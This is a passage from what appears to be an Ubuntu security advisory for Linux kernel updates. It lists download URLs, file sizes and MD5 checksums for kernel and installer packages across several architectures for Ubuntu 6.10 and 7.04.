http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   139998 35d7677a130157b90ad531f063ce0a74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   161498 62e379a3c96720961c61c70dd913d654\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    49992 caad91cfee412936d41e4cf632f5656c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:    54872 ae0ef06a66930aef4baf6699be4c1a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   308222 f5fa9eebbfa4bff4bc75ceb2e8ca69a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.43_powerpc.udeb\n      Size/MD5:   330222 a70f3f022a41ea1bcb98b3875e19a6f7\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:    50720 b04a0fb272052082cccbdefb339ce9c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:     2392 bc4e7685bd3657d50af32d35fb28d3fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:    40662 2e6fca0c5710ced2b99661c008b24bef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:   112216 6ffad38fb5b7ddb6d767e55428d145a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:    41750 1e5fae2a75c852ad96e82724430bb5f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:   105090 13ac4337ef87bb2ab0be001a11c89001\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:     6860 f37a9430bff9e80fa48555d4cedc1c19\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:   147574 ceebaefe104f9392ae4b4314c5b01f64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:  1840728 a2cb57616d185499e0ef7250f1a5c7a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb\n      Size/MD5:   809310 d712716cdd216a47f075ad891afe7200\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb\n      Size/MD5:   805818 205ce72ffc9abe313c43f052fd41aa04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_sparc.deb\n      Size/MD5:  7425700 6b3c927f2565066d8c40ee6c5af873bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb\n      Size/MD5: 15629150 aca3a14023522857cc124dab5b6fcc14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb\n      Size/MD5: 15290418 32a3cbd78d730462bf2035865fad8b6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb\n      Size/MD5:  2173092 f14524b75f7f8d9bfaa015c5ac794f2a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb\n      Size/MD5:  2087106 3a94b9b6c77794c967e47f74e20cfbcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_sparc.deb\n      Size/MD5:  1813902 4ae123feb265722ce4933c087512b922\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:     7398 347c248c966a079fd11caeb2464d646b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:   263990 47724085bae25d550fc824923cac6b03\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:   229200 e7829c679aec5f8d5abc3120ad64218c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:  1048450 be4b7beb10b78c9bdc7cd18cd5444341\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:  1922030 e6d6613dee43a7fb059d176bf1094982\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:     9910 972e3885f262adacd88ef959fbb8a510\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:    40354 556823d49a81a7cd1b6a27c57c6ffaa5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:     8716 dc451bd092f7262f5e31806ce1b66657\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:    59390 7858515ff779dd8da58fd850c019708f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:   162876 499f20d3a838059e6f662b43a293ef11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:    66654 434a52f0d4ad9bf95b0fee7b6eae34f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:   855872 19e82882095228999b8cecf4fe476273\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:    51826 fde5d623191150a5f933bd18f65a8c34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:    38422 505f084581b247b18c6dfaf28dd42b81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb\n      Size/MD5:   283100 4fc122dfd0a59d50507fe961c0644dd8\n\nUpdated packages for Ubuntu 7.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34.diff.gz\n      Size/MD5:  1597203 2f8f7143e0b62b05852fd088e2cdd87e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34.dsc\n      Size/MD5:     2472 8a6fa30067f917154268f54d18ad1d8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz\n      Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.34_all.deb\n      Size/MD5:  4878092 0a9d06c63a48ab4de3a479ffad813429\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.34_all.deb\n      Size/MD5:    85686 6f0468702323c16fb43a01800a06866d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34_all.deb\n      Size/MD5: 47825588 5b00b6faf438c78340d448bc1df0b379\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    24494 995924530f52543de6454b7d746d9333\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   202070 a90f97208c841006a291b7e8e59f2096\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    39342 5bbfcb724ba3c3b3dab26cc87ab418dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    50910 e631a706c635587623f8e4343cd782e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   187500 2427fb977faa7812d945e84dffebb1f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    34906 371ac621cc163f1283a7902751a8583e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   644402 dce5458d9ec5d23712c71df24499e92f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   174672 637bb28658492463bddb7f46c4b0c0fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    76424 9b54d7503783fca16bfefa18aa2fd7a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    57878 cdf5165244a3a47a29dedd359e7bf1ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   140050 83dd75c64e81d878e6b656e96d9d4439\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   277462 b5006ab82457b0b74c6454c4d22e074d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:  1905350 1d415f58f530439ac5f51490f417eb28\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.34_amd64.deb\n      Size/MD5:   858258 4e0d459249f034b388d7524c3e6c16ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb\n      Size/MD5:   858420 4179483fb702bd4cef04b9f6078a2757\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.34_amd64.deb\n      Size/MD5:   862708 01d71f8b4722922e179b524675fa1c2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_amd64.deb\n      Size/MD5:  8130074 83dcaf7f7e555da5bc1404854ed99fd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.34_amd64.deb\n      Size/MD5: 23066730 0334fcbd642e338771023109f5067a1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.34_amd64.deb\n      Size/MD5: 23386230 8846cfc57c9565997449e491ce1b3d58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.34_amd64.deb\n      Size/MD5: 18428504 7d598c9a73f74055615ac8218eb5387b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.34_amd64.deb\n      Size/MD5: 18699402 39c306a22805bf6974212e18cfb2fa3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_amd64.deb\n      Size/MD5:   668772 34a70f259c72918becac26ad722afd7f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   246426 ec42790e28c6f00318c64b17c429de47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   144478 0c938f3447819c6722f9e58f4bf3de14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   225116 d687f68a328f16ff4775d7bdc6e3e8f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:  1110522 8f966a2cc693a2f8f4bdbe4a521835d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:  1754786 a35636dc91b7b744d184f63d4e766597\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   140918 834c60d72611bc80799effe4eff27cfd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   163384 6eb7c5ef728d3e5d0691dd988ebd90c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   265726 c639baa908a1f2d4beaccd72161089f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    34292 7a0ba4ef7bdb5c13fe8f03ba0125662f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    38436 a3817fa7f635d9a01d301ee2029ff04c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    67678 7b0274fcc059bbfb21fc20952e135a83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    20960 9e84de99755587ca96a142706cd0bedb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:     8324 05b68369ac444eae95b592ea23b6cd77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    54578 e1941db8408b6c4b463bdaa55b86670c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    86020 ffd93c6cf7aa89815942ed67dcf387dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   322570 bcac6c4a20f00eaff1a70e8a82b79d17\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:  1046838 46e606e7580618aa35f2966873e6e3f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    43974 0d06666147c779d8696b110ea51c307f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    12016 e71f09e05e8d1b043131ca3dd3ae6036\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    61914 3c5b393e5c46b4e579ce54b7c8a0c4f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:   377812 b1d4ee9bd922cbfad05754df5bd693bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb\n      Size/MD5:    66666 978f2be56849ec76ba6fa1108dc7acf6\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb\n      Size/MD5: 23126452 433c6213d6ddbaa3866b5d41a95dd11a\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb\n      Size/MD5: 18478444 5135e34744d1d42b89a7ac531470f342\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    20314 e0eebf4cc8b2ad8e5934ddbbbee9e67f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    22890 c7da55d48b29becdeea97e5b65efcc5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   210062 912613620e07b25a9ac1e37e1163bde3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   212248 5cc4ecd7bd6e8a0c473fd15876fe3491\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    88688 e53906c8ed25b1422aa45147553ed319\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    35622 36aece0ca9fd7987b512ca2774228a46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    37730 687f50289011f7f86ecc810d909fabef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    38408 ec8eeaff0c82514dc53866fab80b1a39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    45642 53f8ed8e1f4d2132ca2f420169672627\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    45798 6021a27b11317424bbf3ef3edf05c457\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   179462 a48d2ac3c14b78b32f893aae6d0bca9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   179832 0601087ab9d1a61cdffdc02b0b249588\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    32102 f7785eca40c0aa02246b99907a6a6768\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    32428 9c64b5bbcb7a095bcdfa67010061d9d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   648622 7b3e1c0ffc012d00a62a11bd3ce35cad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   667448 67d08ad30ef8a3157b0cdd64a1314527\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   178182 a7edf7640963b45e899143b71e847675\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   181270 82540ad55623e5bd7ebcf13bb67a1c6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    72390 41eebcd4884e0a906e1f8834cb542636\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    74052 28857b1b544fde323ea0105db9238a8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    53566 dcd7c1d2609d55b6042ff8a0479bcc38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:    54778 94e2322def463e0d1ecf327baf65740b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   129214 de8544736aec04cf79fe2cbd11c05fa0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   134886 eb40e81e51a3f5f72baf9da22e5052af\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   275958 c354f73c7348da068d3be4a0ff3e7fc5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   274972 71d5c9ce3443eaaf7dced5a261c2822c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:  1816286 58b6d5fd27f0c2c5fdf3045026d5a9b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb\n      Size/MD5:  1886484 21da86216eab2f41f2d92373b45560d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.34_i386.deb\n      Size/MD5:   846920 4c3d0f777d35d3cf54cf3067e803432f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.34_i386.deb\n      Size/MD5:   850642 b95ffcca084a6e04033441395f2836d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb\n      Size/MD5:   847422 2a89ba8097aa9c2d50f88ae1229a442a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb\n      Size/MD5:   843400 7e69a21ea4e5628bb56b7e6c17497d87\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.34_i386.deb\n      Size/MD5:   837570 08df5ad96399ac2cb8b248b90413ac40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_i386.deb\n      Size/MD5:  8119870 45aa58781c894784b98f37b8945c4eac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.34_i386.deb\n      Size/MD5: 23747632 aaa6ba776d667bd821d404c09ea761f7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.34_i386.deb\n      Size/MD5: 23814104 9fe91f7a3242641ece3f382676af1eef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb\n      Size/MD5: 24376632 850eca8b8584ae7885fac7de41665291\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.34_i386.deb\n      Size/MD5: 23866418 08cf06676f400745d293bf0cfe6ae40c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.34_i386.deb\n      Size/MD5: 23589054 b3a05427be92591b6d2ece8a7668cc1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.34_i386.deb\n      Size/MD5: 24168224 dddc871c7b897776e3882f481d1fa0e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb\n      Size/MD5: 25659442 eea9b0fedc82d6f68dddba4df546a566\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.34_i386.deb\n      Size/MD5: 24394132 acb6f49e06b90cc85eac2ae341abee23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_i386.deb\n      Size/MD5:   668798 d40b9e7086fc0d42b7de761f94930596\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb\n      Size/MD5:   244606 f62271f06d0212f827a7d7770a041142\n    